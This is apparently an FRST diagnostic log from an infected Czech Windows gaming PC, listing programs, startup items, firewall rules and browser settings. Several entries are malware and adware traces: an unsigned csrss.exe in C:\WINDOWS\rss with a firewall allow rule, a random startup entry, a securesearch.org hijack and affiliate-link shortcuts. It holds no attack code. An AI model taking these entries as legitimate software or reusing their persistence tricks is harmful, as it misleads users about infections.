Epic Games Launcher Prerequisites (x86) (HKLM\...\{B633DAAD-9294-4C7D-A625-D5B741A8C2B6}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Fraps (HKLM\...\Fraps) (Version: - )
GameSpy Arcade (HKLM\...\GameSpy Arcade) (Version: - )
Google Chrome (HKLM\...\Google Chrome) (Version: 86.0.4240.75 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
Chromium (HKLM\...\{F0FB183B-A07B-C9BB-11FB-B93BC17B6ABB}) (Version: - )
Java 8 Update 261 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
Launcher Prerequisites (x86) (HKLM\...\{ec50c375-be9a-4642-9b8c-86dcc42e39c3}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Riot Game league_of_legends.live) (Version: - Riot Games, Inc)
Logitech Gaming Software 9.00 (HKLM\...\Logitech Gaming Software) (Version: 9.00.42 - Logitech Inc.)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.20.329 - Logitech)
LogMeIn Hamachi (HKLM\...\{ECC0FA07-863E-44BC-8B1D-DA22F96E5FB7}) (Version: 2.2.0.633 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM\...\LogMeIn Hamachi) (Version: 2.2.0.633 - LogMeIn, Inc.)
Lunar Client (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\1fcec38f-e773-5444-8669-32b8eb41524b) (Version: 2.3.5 - Moonsworth, LLC)
Macrium Reflect Free Edition (HKLM\...\{7488FFD6-2CB1-4A7B-A788-3BCA60A44E7D}) (Version: 7.2.5107 - Paramount Software (UK) Ltd.) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 7.2 - Paramount Software (UK) Ltd.)
Microsoft Edge (HKLM\...\Microsoft Edge) (Version: 86.0.622.43 - Microsoft Corporation)
Microsoft Edge Update (HKLM\...\Microsoft Edge Update) (Version: 1.3.135.49 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Minecraft Launcher (HKLM\...\{CFF44AE9-2908-4D7D-B48B-1CB5139015C7}) (Version: 1.0.0.0 - Mojang)
MobiGame (HKLM\...\{D400ECB0-A0E7-49EC-AF24-D449A4671D11}) (Version: 3.8.15.0 - MobiGame)
Mozilla Firefox 81.0.2 (x86 cs) (HKLM\...\Mozilla Firefox 81.0.2 (x86 cs)) (Version: 81.0.2 - Mozilla)
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
OBS Studio (HKLM\...\OBS Studio) (Version: 25.0.8 - OBS Project)
Paragon Migrate OS to SSD™ (HKLM\...\{D4378A80-C713-11DF-9399-005056C00008}) (Version: 90.00.0003 - Paragon Software)
Pic version 10.2 (HKLM\...\{13E374E4-E610-4F9E-ACC4-E461DA17D869}_is1) (Version: 10.2 - Pics)
pvk_5.4.2.3, версия 5.4.2.3 (HKLM\...\{212945B6-8BD1-4CBE-9399-685AB22FAB51}_is1) (Version: 5.4.2.3 - isp)
Serious Sam 2 verze 2.070 (HKLM\...\{C5E4298B-3581-4AAD-9FAF-2FE76C07EFC8}_is1) (Version: 2.070 - Croteam)
Serious Sam 3 BFE (HKLM\...\{97425B85-2311-435E-9A28-0AA11B41E322}_is1) (Version: - Croteam)
Seznam Software (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\SeznamInstall) (Version: 2.1.32 - Seznam.cz)
Spotify (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Spotify) (Version: 1.1.35.458.g891674f3 - Spotify AB)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Super Meat Boy v1.5 (HKLM\...\Super Meat Boy v1.5_is1) (Version: - Team Meat)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.3.0 - TeamSpeak Systems GmbH)
WinRAR 5.90 beta 3 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.90.3 - win.rar GmbH)
Packages:
=========
Doplněk multimediálního modulu pro aplikaci Fotografie -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x86__8wekyb3d8bbwe [2020-04-27] (Microsoft Corporation)
Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.2.0_neutral__8xx8rvfyw5nnt [2020-05-12] (Instagram)
Media Player Go -> C:\Program Files\WindowsApps\38806TusharKoshti.MediaPlayerGo_4.1.0.0_x86__8xyfwj0nb922c [2020-09-06] (Tushar Koshti)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-11-05] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_3.11.6020.0_x86__8wekyb3d8bbwe [2020-06-09] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x86__8wekyb3d8bbwe [2020-09-06] (Microsoft Studios) [MS Ad]
UnRar Metro -> C:\Program Files\WindowsApps\1253QUANTUMVM.UNRARMETRO_14.5.0.0_x86__ckbnxvahp5f44 [2020-06-12] (QuantumVM)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{E7629152-0A34-4487-B787-5D1144304455}\localserver32 -> no filepath
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [ReflectShellExt] -> {DEBB9B79-B3DD-47F4-9E5C-EA6975BAB611} => C:\Program Files\Macrium\Reflect\RContextMenu.dll [2019-09-20] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-09] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveLite] -> {C06369D6-E77D-4626-9656-1256312BD576} => C:\Program Files\DAEMON Tools Lite\dtshl32.dll [2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [ReflectShellExt] -> {DEBB9B79-B3DD-47F4-9E5C-EA6975BAB611} => C:\Program Files\Macrium\Reflect\RContextMenu.dll [2019-09-20] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
ContextMenuHandlers3: [DaemonShellExtImageLite] -> {1D1B5D7B-0FC9-452E-902C-12BACD4FBC20} => C:\Program Files\DAEMON Tools Lite\dtshl32.dll [2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\atiacmxx.dll [2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-09] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [VIDC.FPS1] => C:\WINDOWS\system32\frapsvid.dll [94208 2019-08-30] (Beepa P/L) [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&aff_sub2=WGcGZy4UcmYtFXMUWmcHZkRjAEcKNQITUDYAHFExDglaZAMcRGfipJgAAAGhXNyUie&click_id=f306cd3d4dae7747931f684cc695e9d8357f3ee3
ShortcutWithArgument: C:\Users\42072\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&aff_sub2=WGcGZy4UcmYtFXMUWmcHZkRjAEcKNQITUDYAHFExDglaZAMcRGfipJgAAAGhXNyUie&click_id=f306cd3d4dae7747931f684cc695e9d8357f3ee3
==================== Loaded Modules (Whitelisted) =============
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\42072:.repos [616623]
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
SearchScopes: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_261\bin\ssv.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_261\bin\jp2ssv.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 04:43 - 2020-09-12 18:14 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\ATI Technologies\ATI.ACE\Core-Static
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\42072\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\103122316 (2).jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "seznam-listicka-distribuce"
HKLM\...\StartupApproved\Run: => "Launch LCore"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "rfxgnkvq"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "CloudNet"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Web Companion"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Mobigame Playstore"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{84300298-B7CB-433F-910C-B145F679ED07}C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe] => (Block) C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe
FirewallRules: [TCP Query User{019068A6-6063-42C6-856F-7D4F25FD45F9}C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe] => (Block) C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe
FirewallRules: [UDP Query User{8D828ACF-4AEA-44C5-A1F6-B4490594C84C}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [TCP Query User{5FE5D572-B26D-4CAE-AC2E-D12DB7450D50}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [{562DE85C-29FE-45F0-AEF0-B6B7F1FA157C}] => (Allow) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{B25BFF2E-534B-4514-B181-D007490F890E}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{320FCA28-90D8-46D0-A192-3787C2D30DA8}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FD11177B-E329-4F0A-AB7C-A7902F91FD7D}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DB43DC0B-5959-4385-8DA3-184F468ABCBD}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{64E88E64-8F50-4D8E-AE6C-A49D73EE61AC}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{00A8BACB-445A-464B-9377-5E105021126D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{2E007B32-DF29-4372-BAD7-4AF580BCCD5E}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe
FirewallRules: [TCP Query User{0B9FD880-9293-4C01-912A-9425048B8CA0}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe
FirewallRules: [{A3C4A266-B549-4CDD-9FD9-8CBB97C57BF0}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [{3EAB28E6-A364-4882-8481-895A574BF274}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [UDP Query User{EAB50D73-12CA-4F3B-87F3-554786A108B0}C:\program files\duke nukem - manhattan project\prism3d.exe] => (Block) C:\program files\duke nukem - manhattan project\prism3d.exe () [File not signed]
FirewallRules: [TCP Query User{5DBABCD5-4461-4ADE-B726-1526E5409DA3}C:\program files\duke nukem - manhattan project\prism3d.exe] => (Block) C:\program files\duke nukem - manhattan project\prism3d.exe () [File not signed]
FirewallRules: [UDP Query User{58A80BB9-3D27-47F4-AF59-9C11F11B08C1}C:\program files\valve\half-life\hl.exe] => (Block) C:\program files\valve\half-life\hl.exe => No File
FirewallRules: [TCP Query User{67D1C637-5380-48E9-86BE-42E95B7CA25E}C:\program files\valve\half-life\hl.exe] => (Block) C:\program files\valve\half-life\hl.exe => No File
FirewallRules: [UDP Query User{15D6B20B-C526-4084-8018-D2BDB13DC0A7}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{71C01058-FA98-4143-BD85-58F8754636AD}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{D37B3EDE-1653-4473-9978-72B09F481D20}C:\users\42072\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\42072\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [TCP Query User{7A8ED71F-1BD3-4647-B441-FDBE38F625C8}C:\users\42072\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\42072\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{551B3597-06A3-471D-9767-EFE87BC8B93C}C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe] => (Block) C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe
FirewallRules: [TCP Query User{F32A8597-1895-4920-BEBF-8B41E9DC6198}C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe] => (Block) C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe
FirewallRules: [{C04E4B27-1BB9-4D05-B483-6B9D3B7A6E43}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{6508FEBA-543A-49C7-8328-EB56538D3FDF}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E4093EED-CD4A-4AC1-B72D-97A4BEF6A8D4}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6F6B4D3D-DC59-4970-A54A-417118EFBC88}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B1B1EA4E-71ED-4AA2-A771-6C1B62B2246F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D2097B25-660C-449A-9396-AF97B8F5BBD1}] => (Allow) C:\Program Files\MobiGame\player\mobiplayer.exe (Game Player) [File not signed]
FirewallRules: [{F3CDFAC5-A975-48F4-9DAB-369F7F2E4853}] => (Allow) C:\Program Files\MobiGame\vbox\vboxheadless.exe (Iron Entertainment Inc. -> Oracle Corporation)
FirewallRules: [{93C34D1D-8364-41F3-844F-1694693AB6AF}] => (Allow) C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe () [File not signed]
FirewallRules: [{96DC6731-E2CF-4F11-BC78-0A40F04761A0}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{103F7BC9-F0D2-47F2-AE12-488E8CCB3AE5}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{E51FC64F-7EDE-49D5-A7D8-3BAEFD4D43A5}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{2E0F18A4-8866-418B-A129-0E740AFCB831}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{A1A1877F-2977-4C42-BC94-5733B7BC5052}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{C57B14A1-38E9-4505-B515-CF973F43D220}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{7A5BBB51-4EC6-4223-9825-D742308E06AC}] => (Allow) C:\Program Files\Steam\steamapps\common\SMITE\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{17AB0CF4-6BF5-4355-855D-FD1B1B3F4558}] => (Allow) C:\Program Files\Steam\steamapps\common\SMITE\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{B77DDFF5-FD77-4EDA-997E-E38211DFD8B7}C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [UDP Query User{42D3A007-3F32-4A37-BFAE-2BEA8902C5D4}C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [{32366988-A515-41D3-B0D4-41DED8B526DC}] => (Allow) C:\Program Files\Steam\steamapps\common\smite pt\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{EEEA3F19-1A43-4849-9875-7F01013DC70A}] => (Allow) C:\Program Files\Steam\steamapps\common\smite pt\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{D44B9937-30AF-4D9B-B4E1-A31DA800E4C4}C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [UDP Query User{0BBCD1EB-1959-44E7-AEF1-C028B8F6D5DE}C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
==================== Restore Points =========================
03-09-2020 09:10:42 Instalační služba modulů systému Windows
==================== Faulty Device Manager Devices ============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Standardní klávesnice PS/2
Description: Standardní klávesnice PS/2
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standardní klávesnice)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears. Remove the device, and this error should be resolved.
==================== Event log errors: ========================
Application errors:
==================
Error: (10/20/2020 09:17:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Informace služby Stínová kopie svazku: Server COM s identifikátorem CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} a názvem CEventSystem nelze spustit. [0x8007045b, Probíhá vypnutí systému.
]
Error: (10/20/2020 09:15:38 PM) (Source: ESENT) (EventID: 447) (User: )
Description: svchost (6664,D,29) SRUJet: A bad page link (error -338) has been detected in a B-Tree (ObjectId: 21, PgnoRoot: 95) of database C:\WINDOWS\system32\SRU\SRUDB.dat (671 => 3078, 21).
Tag: BtDownClinesLowEmpty
Fatal: 1
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
